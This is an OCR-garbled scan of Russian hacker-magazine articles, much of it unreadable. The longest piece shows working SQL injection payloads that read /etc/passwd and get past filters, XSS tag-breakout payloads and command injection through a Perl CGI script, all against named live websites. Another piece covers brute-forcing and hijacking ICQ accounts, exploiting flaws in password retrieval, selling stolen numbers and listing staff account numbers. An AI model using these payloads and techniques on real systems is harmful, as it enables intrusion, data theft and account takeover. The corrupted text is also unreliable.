программы «Кульная Программа 7.7» и приме- 
нении патча, который™ сам написал, но ска- 
зал, что скачал в Сети. 

В ходе следствия тебе пришили две статьи 
УК РФ: статью 158 «Нарушение прав интеллекту- 
альной собственности» и статью 273 «Неправо- 
мерный доступ к компьютерной информации, 
создание, использование и распространение 
вредоносных программ для ЗВМ». 



По идее, статья 273 вообще не имеет никакого 
отношения к патчу. И ты, и экспертиза в силе 
доказать, что это статья тебя не касается. Но... 
Допустим, по 158-ойтебе припишут штраф 
в размере 500 минимальных расчетных 
показателей, а по 273-ейтебе светитусловная 
судимость на 6 месяцев. Ущерб обладателю 
авторских прав в размере стоимости программы 
тебе придется возмещать в любом случае, как 
ни крути. По законодательству, статья, имеющая 
большую степеньтяжести, покрываетту, которая 
имеет меньшую. То есть 273-я в этом случае 
покрывает 158-ю, и тебе светиттолько полгода 
судимости без какого-либо штрафа. Такчто вы- 
бирай сам, стоитли отмазываться от судимости 
и платить потом всю жизнь. 

□ Итог 

Как видишь, обойти проблемы с финансовой 
милицией не очень сложно. Главное — не от- 
кладывать все в долгий ящик, а начинать 
действовать сразу. Чем дольшеты тянешь, 
тем больше вероятности, что тебя накроют 
медным тазом. □С 




> Одна из групп подкрепления 
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ЛЕОНИД «ВОЮ» ОТРОЙКОВ 

/ пою@маи..віі / 



НЕДЕТСКИЙ 
ВЗЛОМ 
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Ты уже не раз читал на страницах «Хакера» о различных методах взлома, да и в Сети 
полно статей на аналогичные темы. Вот только большинство из них затрагивает лишь 
часть случаев, и, как правило, самых простых. Примитивные инъекции, удаленные 
инклуды, активные х$5 — все это только верхушка айсберга. Скорее всего, в твоей 
практике были ситуации, когда тебе приходилось отступать и прекращать атаку. А ведь 
при поломке крупного ресурса шанс найти распространенный баг очень мал. Поэтому 
при проведении более-менее серьезных атак требуется максимум внимательности и со- 
образительности. На решение поставленной задачи порой уходят сутки, а то и недели, 
но настоящие профессионалы никогда не сдаются. Не зря говорят: «Профессионал 
— это тот, кто ломает то, что хочет сломать, а не то, что может сломать». Сейчас я рас- 
скажу о наиболее часто встречающихся ситуациях, осложняющих и без того непростую 
^ хакерскую жизнь. 



□ Проблемы со зяі-іпіесііоп 

Как ни крути, но в последнее время рулят 
именно зці-инъекции. Программеры все 
чаще юзают МуЗСП/МЗЗСП-базы, не забывая 
кодить потенциально бажные движки :]. 

О зцМщесбоп уже несколько раз писалось 
в журнале, поэтому не вижу смысла повто- 
ряться (лучше почитай подшивку «Хакера»). 
Так что приступим непосредственно к сути. 
Какты знаешь, все инъекты можно разделить 
на два типа: слепые и не слепые. Особенный 
геморрой при взломе создают слепые инъек- 
ции, так как в этом случае мы лишаемся воз- 
можности видеть ответ на свой запрос и саму 
ошибку. Причиной в рЬр-скриптах может 
служить, например, егго г_геро гіі п д (0) (режим 
сокрытия сообщений об ошибках в рбр) 
и символ «О», поставленный перед функцией. 
Чтобы тебе было понятнее, рассмотрим это 



явление на конкретном примере. Возьмем 
норвежский ресурс ѵѵѵѵѵѵ.каггіегедиісіеп.по 
и перейдем по ссылке: 

ЫсЦр: //утѵлу.каггіегедиісіеп.по/ 
ргезепкакіоп. ркр?іс1=144 

Если теперь подставить символ одинарной 
кавычки в значение параметра ісі, то вместо 
предполагаемой ошибки мыувидим просто 
пустую страницу: 

ЫсЦр: //ѵтѵлу.каггіегедиісіеп.по/ 
ргезепкакіоп . ркр?іс1=144 1 

Следовательно, есть вероятность наличия 
бага. Подобрав количество полей, можно 
убедиться, что уязвимость действительно 
присутствует: 



Ыскр: / /ѵішт. каггіегедиісіеп.по/ 
ргезепкакіоп . ркр?іс!=-1+ипіоп+зе1ес 
к+1, 2, 3,4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 
,15,16,17,18,19,20,21,22,23,24,25, 
26,27,28,29,30,31,32,33+/* 

Если подобрано правильное количество полей, 
на экране будут отображены предназначенные 
для вывода поля. В нашем случае — шестое 
и седьмое. В некоторых конкретных случаях 
для подбора количества можно использовать 
конструкцию «огбег Ьу». Это выглядиттак: 

Ьккр : / /кагдек . сош/іпсЗех . 
ркр?іс1= 1 +огсЗег+Ьу+10/* 

Если полей больше 1 0-ти (или ровно 1 0), то 
ошибки не будет (или при слепом инъекте стра- 
ница отобразится в обычном виде), в противном 
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ЪиіІсЬу кі ьЬіг Еізі 



случае мускул злобно ругнется (а при слепом инъектеты уви- 
дишь пустую страницу]. Однако существенно осложнитьтвою 
жизнь можетеще и фильтрация определенных символов. 
Бывает, что, даже при наличии прав Е1е_ргіѵ, прочитать файл 
не получается из-за фильтрации кавычки. Обойти это можно 
при помощи сЬаг() воттаким запросом: 

ЪДДр : / /шш. іашсаі . сот/тізс/1опс!опЫоддегз_ 
ѵ1/зДаЦіоп.рЬр?і(і=-1+ипіоп+зе1есЦ + 1 , 2 , 1оасі_б 
і1е(сЬаг (47,101 ,116,99,47 ,112,97 ,115 ,115 ,119 
,10 0) ) ,4,5,6,7,8,9,10,11,12 + /* 

В результате мы прочитаем /еіс/раззѵѵсі с сервера, на кото- 
ром хостится ресурс ѵѵѵѵѵѵ. іа тсаі. сот . Кстати, для того чтобы 
вручную не переводить символы в их А8С 1 1 -код, я написал 
нехитрый скриптец, сорец которого лежит на нашем диске =). 
Если ты думаешь, что сложнее уже некуда, то глубоко оши- 
баешься. Самый геморрой все еще впереди. Бывает, что 
в самом запросе, в имени поля, нельзя использовать буквы. 
На первый взгляд кажется, что ловить здесьабсолютно не- 
чего и надо сворачивать удочки. Но, на самом деле, обойти 
фильтрацию можно при помощи аез_сІесгурШ/ае5_епсгурШ: 

ЫсОр: //СаД-саД . со . ик/ ДаДсаД /агДізДІпДо . 
р]тр?іс!=-1+ипіоп+зе1есД + 1 ,2,3,4, аез_ 

(ЗесгурД (аез_епсгурД (изег ( ) , 0x71) , 0x71) ,6 + /* 

Ответ вернет нам лишь одну строчку — <<гооДС91осаІНозД» =]. 

Еще один распространенный случай — фильтрация пробела, 
которая, к слову, тоже успешно устраняется с пути хакерского :). 
Дело в том, что вместо пробела можно использовать коммен- 
тарии. То есть если мы хотим подобрать количество полей 
в таблице на ѵѵѵѵѵѵ. за ѵѵогзЫр.сот . то запрос будет не таким: 

ЬДДр: / /тт. заѵгагзМр . сош/агДісІе-раде . 
р!ір?ІБ=-1+ипіоп+зе1есД + 1 ,2,3,4,5,6,7,8,9,10, 
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 



,26,27,28,29,30,31,32,33,34,35,36,37,38,39/* 
&Раде=зіпд1ез . рЬр 

А воттаким: 

ЬДДр: / / УЛУУ7 . захѵогзЬір. сош/агДісІе-раде . 
р]тр?ІВ=-1/**/ипіоп/**/зе1есД/**/1 , 2 , 3 , 4 , 5 , 6 , 
7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 
,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 
7,38, 39/*&Раде=зіпд1ез . рЬр 

Этот запрос успешно выполнится, и ты увидишь отобра- 
жаемые поля =). Какты понял, геморройных ситуаций при 
проведении инъекций хватает. Иногда получается так, что 
несколько описанных мной случаев комбинируют между 
собой. Но главное не паниковать и не опускать руки. 

□ Нестандартные хзз 

Теперь настало время рассмотреть нестандартные хзз-баги. 

Что такое? Я слышу неодобрительные возгласы и свист гнилых 
помидоров с задних рядов... Зря,товарищи,зря!Тех, кто несчи- 
таетхзв уязвимостью, я попрошуудалиться, ибо все сказанное 
мной вы все равно пропустите мимоушей. Для остальных на- 
помню, что приуспешном раскладес помощью даже примитив- 
ного хвв-бага порой можно получить пользовательский аккаунт 
ил и доступ к панели администратора сайта. Нов последнее 
время поля стали фильтровать все чаще, и простая проверка 
вида <5спрІ>аІегі('х55')</5сгірі> в 80%случаевуже не прока- 
тывает. Возьмем популярный в рунете ресурс ѵѵѵѵѵѵ. Ьоіеі.ги . 
Полазив немного полинкам, несложнозаметитьсамописный 
форум. Нас, собственно, больше всего интересуетформочка для 
созданиятем/сообщений. Повтыкав во все поля стандартные 
<5спр1>а1ен('х55']</5спр{>, многие подумают, что хзв здесь и не 
пахло. Но это только на первый взгляд. Вбивіаѵазсгірі-код в по- 
ле«Сообщение»и присмотревшись к сорцу странички, можно 
обнаружить, что кавычка никак не фильтруется, а перед нашим 
кодом открыты тэги <ТЕХТАРЕА>, <Тй> и <ТП>: 



<хх><>о<>о<><>&<><><х>ъ<><>оъо<><><><><><><>><><><><>о<><х>о<>^^ 

ПРИЧИНЫ ВОЗНИКНОВЕНИЯ ХАК-ГЕМОРРОЯ 

Как ты уже понял из статьи, все наиболее крупные взломы не обходятся без такого явления, как «хак-гемор», или геморрой 
при взломе. Причины этого явления кроются, прежде всего, в недружелюбно настроенных по отношению к нам (хакерам) 
админах. Приведу пример. Не так давно, при взломе сервера достаточно крупной забугорной организации, мне удалось 
получить и расшифровать хэш рутового пароля к базе. Причем имелась возможность удаленного подключения к БД. Но тут 
меня ждал облом — файр жестко фильтровал все подключения к открытым портам, разрешая коннектлишь с определен- 
ных ІР-адресов. Аналогичные правила работали и для 21-го и 22-го портов. Этот факт несомненно огорчил, хотя доступ 
к интересующей меня базе я в итоге получил, раскрутив слепой инъект и подобрав таблицы с полями. Этот случай лишь 
подтверждает необходимость использования всех возможных методов при взломе. Ведь если шанс есть, значит, нужно 
пробовать его реализовать =). 
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>На дискеты 
найдешь мой скрипт 
сбаг.рі, с помощью 
которого можно без 
лишнего геморроя 
преобразоватьсим- 
волы в их АЭСІІ-код. 




>Никогда не сдавай- 
ся. Ищи новые пути 
решения проблемы. 
Все простые пути уже 
нашли до тебя. 




>Внимание! Все 
действия взломщика 
противозаконны! Ин- 
формация представ- 
лена исключительно 
с целью ознаком- 
ления! Ни автор, ни 
редакция за твои 
действия ответствен- 
ности не несут! 
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>На ВѴО-дискеты 
найдешь видео по 
взлому к статье. 
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> Используем ІоасМіІе для чтения файлов на сервере 




ТЫ* Ь д 1М№і Рг«* 1>а(нід 5*гѵк« - N0- СКагрвэ СѴЬЙ. 




>Составленный хзз-сплойтуспешно пашет 



<ТК ВССОЬОК= "#Ш2е4:" хТБхТЕХТ 
АКЕА ЫАМЕ= " шезд» КОМЗ = Ю СОЬ5 = 49 
с1азз = ^огшз1ѵ^МЕе зБу1е= "місІЕЬ : 400 
" хзсгірЕ>а1егЕ ( ' хзз ' ) </зсгірЕ></ 
ТЕХТАКЕАх /ТБх /ТК> 

То есть нам нужно закрыть все открытые до 
нашегоіаѵазсгірі-кодатэги, после чего указать сам 
Іаѵазсгірі-код. Выглядетьв Ыті-сорцеэтобудеттак: 

<ТК ВССОЬОК= "#Ш2еА" хТБх 
ТЕХТАКЕА ЫАМЕ="шезд» К(Ж5=10 
СОЬЗ=49 с1азз = Тогшз1ѵ^]тіРе 
з Ду 1 е = " ѵ^і ЙВЬ : 4 0 0 " х /ТЕХТАКЕАх / 
ТБх/ТКхзсгір1і>а1егР ( ' хзз ' ) </ 
зсгірВх/ТЕХТАКЕАх/ТВх/ТК> 

Асам сплойт примет вид: 

< /ТЕХТАКЕАх /ТБх/ТКхзсгір1і>твой_ 
яваскрипт_код_здесь</зсгірЕ> 

Похожую ситуацию, но уже в другом ракурсе 
можно наблюдать на сайте ѵѵѵѵѵѵ.рІепБ/оДізЬ.сот . 
После прохождения в раздел регистрации 
( ммм.рІепІѵоДізЬ.сот/гедІБІюг.азрх І и введения 
в поле пароля символа одинарной кавычки тебя 
попросят за пол нить все поля. Однако, дописав 
параметр раззѵѵогсі и придав егозначению 
символ кавычки, мы получим тотже результат. 
Составляем линк: 

йРРр: //ѵѵѵлѵ.рІепРуоТТізІі. сот/ 
гедізВег . азрх?раззѵ^огсі=<зсгір1і>а1е 
гР ( ' хзз ' ) </зсгірР> 

Нас просят пройти лесом. Хотя, если заглянуть 
в Ніті-сорец, видно, что сначала необходимо 
закрыть кавычкой ѴАШЕ и указать«>»: 

<ТБхШРТІТ с1азз= " іприР " 

ТУРЕ= " іприВ " БАМЕ= " Раззѵѵогсі" 

ѴАЫІЕ= " " ЗІ2Е= " 13 " МАХЬЕШТН^"ХЗ" 
зРу1е="ѵ^і<іР]т: 100рх"> 

Составленный с учетом всехтребований, 
запрос успешно сработает: 

йРРр: / /тш. рІепРуоРРізЬ. сот/ 
гедізРег . азрх?раззѵ\гогс!= " хзсгірр>а 
ІегР ( ' хзз ' ) </зсгірР> 



Асам эксплойтполучитсятаким: 

" хзсгірр>яваскрипт_здесь</зсгірр> 

Я привел лишь пару случаев. На самом деле, 
тема хББ гораздо глубже, геморроя хватает. 

□ Прочий «головняк» 

Помимо всего прочего, часто встречаются 
и отдельные варианты «головняка». В час- 
тности, в перл-скриптах может присутство- 
вать фильтрация пробела. Например, ресурс 
ѵѵѵѵѵѵ.ситсіа.ога содержит бажныйскриптзНаѵѵПІе.сді. 
Передав параметру біепате значение іб, мы 
увидим, что команда успешно выполнилась: 

ЬВВр : / /ѵіѵм. ситсіа . огд/сді-Ьіп/ 
зізсжіііе . сді?сіігесВогу=сді- 
Ьіп&бі1епате= I ісИ 

Но выполнение любой из составных команд 
(рз -ах, І5 -Іа, ипате -а, и т.д.) окажется не- 
удачным, так как пробел фильтруется. В перле 
подобное ограничение можно обойти при 
помощи $ІЕ5, то есть тебе достаточно поменять 
в запросе все имеющиеся пробелы на $ІЕ5. 
Втаком случае просмотреть версию операцион- 
ки на сервере не составит труда: 

ЬВВр : / /ѵіѵм. ситсіа . огд/сді-Ьіп/ 
зЬохѵііІе . сді?ЬігесДогу=сді- 
Ьіп&іі1епате= I ипате$ІЕЗ-а I 

Еще один неприятный момент — авториза- 
ция в админке через .ЫраззѵѵсБ Дело в том, 
что даже если ты каким-то образом прочитал 
содержимое .ЫраззѵѵсІ, то пасс там в 99% 
случаев будетлежать в зашифрованном виде. 
Причем в разных случаях алгоритм шифрова- 
ния может быть разным. Это связано с тем, что 
утила ЫраззѵѵсІ, идущая в комплекте с Апачем, 
поддерживает несколько алгоритмов шифро- 
вания, а именно — БЕБ (ключ ‘-сГ], МБ5 (ключ 
‘ - гтт ’) и 5НА(ключ ‘-б’). При наличии на руках 
примеров хэ шей этих алгоритмов, не составит 
особого труда определить, с каким ключом 
работаетутила ЫраззѵѵсІ в конкретно взятом 
случае. 

Также стоит упомянуть об азр-движках. Здесь 
следует опровергнуть мнение о том, чтоазр- 
скрипты могут работать только под виндой, как 



считают многие. Хотя азрх встречается исключи- 
тельно под ѵѵіп, азр-движок не плохо себя чувс- 
твует и под никсами. Взлому азр-движков будет 
посвящена моя статья в одном из следующих 
выпусков журнала, поэтому подробно заострять 
внимание на этом сейчас я не буду. Скажулишь, 
что расширению не всегда можно верить — оно 
запросто может оказаться фейковым. Кстати, 
нельзя чрезмерно доверять и баннерам, при- 
надлежащим крутящимся на сервере службам. 
Грамотный админ не обломается изменить стан- 
дартное приветствие Др/зтір-сервера. Не зря 
говорят: доверяй, но проверяй. Всегда следуй 
этому правилу. 

В заключение обращу твое внимание на 
получение доступа к базе. Какты понимаешь, 
зачастую, даже имея на руках раскрученный 
инъект, хочется получить полноценного юзера 
(читай — рута =)) в ломаемой БД. Изначально 
многое зависит от пользователя, с правами 
которого работает с базой уязвимый скрипт. 
Если естьдоступ, например, к базе МуБОЕ, 
то не поленись проверить возможность 
удаленных подключений к БД (таблица изег, 
поле ИозД. Если такая возможность присутс- 
твует — считай, что тебе повезло. Сливай хэш 
рутового пароля к базе (таблица изег, поля 
изег и раззѵѵогсі). Как правило, пасс бывает 
в виде МуБОБ-хэша (16 символов), но иногда 
встречается и алгоритм 5НА-1 . Первый 
брутится без проблем (смотри утилу в разде- 
ле «Х-Тооіз»), а вот с 5НА могут возникнуть 
трудности. Если удаленные подключения 
запрещены, то я всеже советую тебе сбрутить 
пассы юзеров БД, так как нередки случаи, 
когда они подходят к Др. Ну а при отсутствии 
доступа к базе МуБОБ, но при наличии прав 
ІіІе_ргіѵ, читай конфиги и сорцы, которые мо- 
гут содержать в себе заветные пароли. Конфиг 
Апача поможеттебе определить расположе- 
ние директорий виртуальных хостов :). 

О Последнее слово 

Рассмотреть все случаи в рамках одной статьи 
нереально. Я обозначил лишьте, которые 
наиболее часто встречаются в повседневной 
хакерской жизни. Надеюсь, ты понял, что взлом 
— это не просто применение чужих сплойтов, 
ной реализация своих собственных идей. 
Всегда борисьдо последнего и помни — про- 
фессионалы никогда не сдаются. ІИ 
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/ ѴѴѴѴѴѴ.ЫЕѴѴШЫ.ПЦ / 



ВСЯ ПРАВДА 



ОБ ІСО 



ПОСЛЕДНИЕ СЕКРЕТЫ ТЕТИ АСИ 



С выхода последних факов и мануалов 
по ІСС^-хакингу прошло довольно много 
времени. Что-то осталось, что-то стало не- 
актуальным и кануло в прошлое. Все давно 
умеют пользоваться ірсШгиіе, знают, отку- 
да достать базы РМ (ргітагу таіі) и как их 
чекать. Поэтому в статьей расскажу о дейс- 
твительно новых тонкостях ІСО-мира. 




□ Свеженькие пятизнаки 

Хочу развеять стереотипное представление 
о том, что абсолютно все пятизнаки регистриро- 
вались в бородатом году и пятерокс простыми 
паролями уже не осталось. В этом, конечно, 
есть доля правды, но откроютебе один секрет. 
Как всем известно, пятизнаков отнюдь не 
10000-99999, а гораздо меньше — немногим 
более двух тысяч. Так вот составленная при 
помощи программы еггѵѵоікег собственная база 
«живых» пятизнаков существенно отличается от 
старой, что выкладывалась на асечке. В новом 
списке откуда-то появились левые номера, 
большая часть из которых элитная, наподобие 
ХХуХХ. 

Решив проверить свежак на простейшие паро- 
ли, после недолговременного брута я получил 
весьма неплохой результат: наикрасивейшие 
пятизнаки «летели» на пароли типа «іпіегпеі» 
и даже «12345». Как оказалось, это были номера 
новых работников ІСО и ихдрузей. Несмотря на 
успешный улов, погоду немного портилото, что 
процент возвращений уина хозяевам был велик, 
но что-то все же оставалось. Учитывая легкость 
их добычи, это, в общем-то, устраивало. 
Расскажу о веселом случае, произошедшем 
с моим другом. Он снял номер Ьссіеа на пароль 
«оргевв», естественно, поменял его и отложил, 
но брут продолжал работать, и в листах еще был 
этотуин. Каковоже было его удивление, когда 
уин снова выпал в бруте, но с уже более простым 
паролем «виві». Как оказалось, хозяином уина 
была подруга админа, которая после угона ее 
номерка поставила парольеще проще. Такчто 
следи за появившимися пятерками и дерзай ;). 



□ Админы ѵз асечники 

Не секрет, что люди из Мирабилис посещают 
порталы, посвященные ІСО-хаку. Они прекрасно 
понимают, что происходит на подобных сайтах, 
знают адреса наших магазинов и никаких дейс- 
твий не предпринимают. Ведь мы фактически 
продвигаем их продукт, отасечников они узнают 
о различных багах, связанныхс асей. Но в каж- 
дом стаде есть паршивая овца... 

Одним прекрасным утром я включаю компьютер 
и первым делом захожу в аську. Не проходит 
и пяти минут, как на экране выскакиваеттаб- 
личка «Ваш номер используется на другом ком- 
пьютере». Я сразу понимаю, чтоаська неугнана. 
Проверяю статус своего номерка программой 
ІСОіпІо и вижу страшное — уин удален из базы. 
Чекаю уин напарника по магазину — анало- 
гичная ситуация. Я в шоке и некоторое время 
не могу дать объяснение случившемуся. Иду 
на форум асечки с надеждой найти там ответы. 
Вижу тему про анреги, в ней отписались ребята, 
у которыхтоже в этотденьубили уины. Топик на 
форуме в считанные часы разрастается до мно- 
жества страниц — люди предлагают различные 
версии причин случившегося, но я колеблюсь 
междудвумя: админы ІСО илитурки. Админы 
стоят под большим вопросом, так какудалили 
только контактные номера с шопов, а не их 
содержимое. Могли и турки, так как любят ковы- 
ряться и находить баги, к тому же они не особо 
жалуют русских. На форуме паника, постояльцы 
скрываютсвоиуины масками, многие магазины 
на время прекращают свою деятельность. 

После долгих расследований причина была 
найдена. Сверив логи посещения наших шопов, 



мы нашли одинаковый ІР. Рефер был из Яндекса 
по за просу «продажа ІСО- номеров». ѴѴЬоів-сер- 
вис выдал, что ІР принадлежит Атегіса Опііпе 
ІСО. Все стало на свои места, владельцы шопов 
оперативно забанили сетку АО На на своих 
сайтах и зажили счастливо. Только этот олень 
все не могуспокоиться: в логахбыло видно, 
какой много раз пытается проникнуть на сайт. 
Видать, что такое прокси, ему никто не говорил. 
Как потом удалось выяснить, этим админом был 
І_іог Сгаб и у него почему-то ненависть к рус- 
ским. Может, он обиделся, что его старый пятак 
тыранули и он лежиту нас ;], но странно, почему 
он его тогда не возвращает. 

□ ІС(НІ5Ыпд 

Наверняка, многие пользователи, имеющие 
красивый номерок, подвергались разводкам 
различных «кис», «похотливых попок» и т.д. 
Например, сидишьты, попиваешь пивко, и вдруг 
с неизвестного уина приходит месса га отнекой 
обожательницы, мол, ты обязан зайти поданной 
ссылке посмотреть на ее сиськи или что-нибудь 
скачать. В этот момент от нехватки женско- 
го общества твой подпитый мозг принимает 
решение всеже взглянуть на фото. Проснувшись 
утром с головной болью, ты пытаешься зайти 
в асю, нотут выскакивает непонятнаятабличка 
«Неверный пароль», а все твои пассы улетели 
к «неизвестной даме». В то время какты ломаешь 
голову над восстановлением паролей и избавле- 
нием от коняги, какой-то паренекоттвоего имени 
разводиттвой же контакт-лист, занимает деньги 
или впариваеттроя. 

Также часто спам в аську имеет похожий характер. 
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Не буду вдаваться в подробности, но хочу пре- 
дупредить хозяев длинных номеров: не стоит 
думать, что раз номер кривой, то надо ставить 
пароль «123» и он никому не нужен. Для спама, 
флуда и т.д. требуется много уинов, а горя- 
чо любимые мирабы постоянно прижимают 
ІСО-спамеров и строят разные козни, делая не- 
реальным авторег кучи уинов. Поэтому сбрутить 
необходимое количествоуинов актуальнее. 

Для прекращения страданий от назойливого 
спама изэбаута номера необходимо удалить все 
инфо, кроме ника. Дело в том, что спамерский 
софт работает целенаправленно, то есть если 
в графу «Язык» вписан, например, албанский, 
а заказчику спама нужен только албанский 
контингент, тотвойуин автоматом попадает 
под его спам. Крометого, можноубрать галку 
с «Показывать мой статус для веб и поиска» 
(веб-индикация), чтоб цветокбыл белым. 

ОРМ-базы — эффективный способугона? 

Рассмотрим разные новшества, введенные 
мирабами при ретриве. В последнее время ра- 
ботники ІСОтак часто что-то меняли в системе 
восстановления пасса, что сами запутались 
и наделали косяков. 

Итак, сама система ретрива образовалась 
в далеком 1999 году, на страничке ІСО.сот/ 
разБѵѵогсІ появилась возможность высылать 
пароль на вписанный в деталях номера е-таіі. 
Система работала стабильно, и особыхтруд- 
ностей с отправкой пароля не было. Примерно 
в середине 2004 года возникло понятие «но- 
мер-невидимка» — номер, который не виден 
в поиске (ака вайтпагах). При долгой отлежке 
у номера пропадал контакт-лист и все инфо. 
Четко определенного промежутка времени, за 
который неюзаемый номер становился невиди- 
мым, не было: иногда номер исчезал из поиска 
за год, в некоторых случаях и за два номер не 
становился невидимым. Чтобы номер вернулся 
к жизни, нужно было вписать детали в инфо 
номера илиже залогиниться в него 



альтернативным клиентомтипа миранды или &ПО. 
Номеров-невиди мок становилось все больше, 
и к концу 2004 года около 30% пяти-, шести-, 
семи- и восьмизначных номеров были неви- 
димками. Инвизы считаются самыми надежны- 
ми номерами, так как невидимость — это гарант 
того, чтоу номера нет примака. 

Первые интересные изменения в ретриве 
появились в начале января 2005 года, когда 
у всех номеров-невидимокотвалился прайма- 
ри-мейл. Наиболее популярным было мнение, 
что это попросту глюк в базе и праймари 
у невидимокотвалился из-за некомпетентности 
работников ІСО. Я слабо в это верю и считаю, 

> Сохраненная страничка 



что это вполне обдуманные действия мирабов 
с целью обрезать крылышки любителям угонять 
номера через праймари-мейл ;). 

Следующие изменения произошли 28 марта 
2005 года: при ретриве пароля на номер в обя- 
зательном порядке стало нужно устанавливать 
секретные вопросы, после чего праймари-мейл, 
с которого их ставили, просто отваливался. 

С этого дня сервис по восстановлению пароля 
с натяжкой можно было назвать стабильным. 
Творились чудеса: праймари у номеров то сами 
по себе отваливались, то вновь волшебным 
образом «воскресали», и на них снова можно 
было отослать пароль. Бывало, страница 
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>Ломая номера 
мирабов, из охотника 
легко превратиться 
в жертву. Не редки 
случаи, когда админы 
по ІРубивают кому- 
то пачку номеров. 
Настоятельно реко- 
мендую взламывать 
только незанятые 
уины. Особенно недо- 
стойны уважения 
те, кто тырит уины 
у своих — русских. 




>Сейчас самыми 
короткими уинами 
считаются пяти- 
знаки, но раньше 
существовал и трех- 
и четырехзначные 
уины. Они считались 
тестовыми номе- 
рами. В настоящее 
время существуют 
одно- и двузначные 
уины, но их нельзя 
за юзать ста н да ртн ы м 
клиентом, это только 
ѵѵеЬ-сервисные 
номера. 




> ЬНр://а5есЬка.ги 

— мощнейший про- 
ект, посвященный 
ІСО-хакингу. 
бирУ/Ыеуушп.ги 

— отличный магазин 
ІСО-номеров, доступ- 
ные цены. 
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> На диске ищи про- 
граммы, упомянутые 
в статье, плюс вспо- 
могательный софт. 




> Привязанный номер 



ѵѵѵѵѵѵ. I С 0 . со т/ ра ввѵѵо гб подолгу не открывалась или зависа- 
ла на какой-то стадии ретрива. 

Более-менее система стабилизировалась в феврале 
2006-го. Произошло и еще одно изменение: теперь прай- 
мари-мейл не отваливался после установки вопросов при 
условии, если это первый вписанный мейл. И наконец, 
в июне 2006-го, на радость всех брутеров, отвалились 
примаки почти у всех, за редким исключением, номеров, 
вписанных до начала 2006 года. Таким образом, утверж- 
дение, что чем старее база, тем она лучше и правдивее, 
стало неактуальным. Своими действиями работники I СО 
добилисьжелаемого: форма ретрива используется по 
прямому назначению, на мыльные сервисы перестали 
лететь тонны пакетов от чекеров. Но недавний баг немного 
оживил ситуацию. 

При серчеуина вписанное в детали мыло показывалось 
независимо оттого, стояла галочка «Не показывать адрес 
емейла» или нет. В моментбыли собраны новые базы, 
и новые примаки, которые все скрывали, были в этой базе. 
Конечно, выжать из этих баз удалось не особо много, но все 
же что-то удалось. Безусловно, больше повезло первым из 
тех, кто прочекал новую базу, в которой накопилось достаточ- 
нозаброшенныхадресов мыла. 

О ІРй БЕ — брут нового поколения 

Итак, дорогой дружок, ты, наверняка, слышал и, возможно, 
даже видел и пользовался такой чудесной программой 
для перебора паролей куинам (или, говоря человеческим 
языком, брутом ;)), как I р сі Ь ги 1е 2/и сі с Бііе, или ее модифика- 
цией, умеющей автоматически менять пароли на обрученных 
номерах, — ІрбЬги1е2/ибс Рго. Но откроютебе небольшой 
секрет: есть еще и специальная приватная версия, которая 
именуется ІрбЬгиІе2/ибс РгоЗЕ. ѴКЕ (автор ІРБ) не стал ее 
выкладывать в паблик, а распространил среди своих друзей 
и хороших знакомых с наставлением не раздавать ее всем 
подряд и использовать только для своего блага. Как мы уже 
выяснили, в каждом стаде есть паршивая овца, и брут не 
такдавно всеже просочился в паблик. Тщательный осмотр 
пациента в нашей ІСО-лаборатории позволил представить 
тебе отчет, приведенный ниже ;). Итак, смотрим, чем же так 
хорош этот ІрбЬгиі:е2/исІс5Е и почему 2 года его не рисковали 
выложить на всеобщее обозрение. 

При первом запуске заметно мало отличий от ІрбЬги1е2/ибс 
Рго, разве что изменилась надпись в шапке с «ІрбЬгиІе2/ибс 
Рго (с) 20002-2003 ѴКЕ» на «ІрбЬги1е2/ибс 5Е (с) 1 980-2004» 
и в «АЬоіЛ» появились приветы отавтора небезызвест- 
ным на ІСО-сцене личностям. Интерфейс программы не 
претерпел каких-либо изменений. Теперь посмотрим на саму 
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работу брута. Во втором издании брут работает через разные 
серверы 100, которые можно редактировать самому в файле 
тасговез.хті. Благодаря этой возможности новый брут 
выигрываету своей предыдущей версии, которая логинится 
только к стандартному серверу на 5190 порту. 

Итак, мы взяли 130 скоростных проксей и попробовали 
угнать какую-нибудь шестизначку на пароль «ѵедав». Значе- 
ние Опгеабз (потоки) мы выставили в 500, сіеапир (отсеи- 
вание мертвых проксей) был каждые 30 минут. Количество 
потоков выставляется методом проб индивидуально под 
каждый конфиг компа и канал инета. 

Теперь посмотрим на сравнительную таблицу работбрутов: 
Какмы видим, ІрбЬгиіе2/ибс Рго значительно проигрывает 
в скорости ІрбЬги1:е2/ибс Рго5е,такчто выкидывай свой 
старый брут и переходи на более продвинутую версию 5Е. 

Что касается результата, то в ходе эксперимента было вы- 
ловлено 26 шестизначек :). 

О Вся правда об админах ІСО 

Каждый из нас когда-то думал: 

1. На какихже номерах сидят работники ІСО? 

2 . Могутли простые смертные сидеть натаких номерах? 

3. Реальноли поиметь админа ІСО? 

Нам удалось подобраться очень близко к ответам на все эти 
вопросы. 

Отвечаем: 

1. На ѵѵѵѵѵѵ.пеѵѵиіп.ги/іп/сІЧхІ: лежит контакт одного 
из админов; знакомые говорят, что этотсписок 
самый полный. В группах Со-ѴѴогкегв, Ех- ІСО, Ѳепегаі, 
ЗирроН сидятбоги ІСО. Отметим несколько групп в его 
контакте. 

Рашііу; 342764160; УаеІАІоп; 0 
Рашііу; 44448 ; 2 Іѵ; 0 
Рашііу ; 59995 ;уае1 зіз;0 

Пятизнаки ху — жене и ребенку, теще — кривой девятизнак ;). 

ІСО иіпз і діѵе; 55515 ; зіапізіаѵ - Оеѵ; 0 
ІСО иіпз і діѵе; 87778 ; Ьеоп - ѵ\/еЪ;0 
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За отдельную плату я дам номер админа =). 

Как этож надо было просить, чтоб он дал 
пятизнакху. 

ту Тапз; 3 9 666 ;Ра11еп Апдеі ; О 
ту Тапз ; 661186 ; о2 СоосІіе2;0 

Админы столь популярны, что у них есть фанаты! 
И больше всего порадовала группа эта группа: 

Ьаскегз; 102030404 ;ЫикесіХ ' з Вок; 0 
Ьаскегз ; 7 99499 ;№ікесІХ ' з Вок;0 

Иногда работникам влом лезть в БД 100, и они 
поверяют примаки номеров по боту ЗЗТІІР'а. 

2. Могут, но чаще всего хорошенькие номера не 
долго задерживаются в чужих руках. 

3. Реально, и случается это довольно часто. 

Но бывает и наоборот. 

По этому списку можно сверять свои пятерки: 
админские они или нет. И, например, если пяти- 
знак подходит под группу Ех-ІСО, то есть человек 
уже не работаетна Мирабилис.то много шансов, 
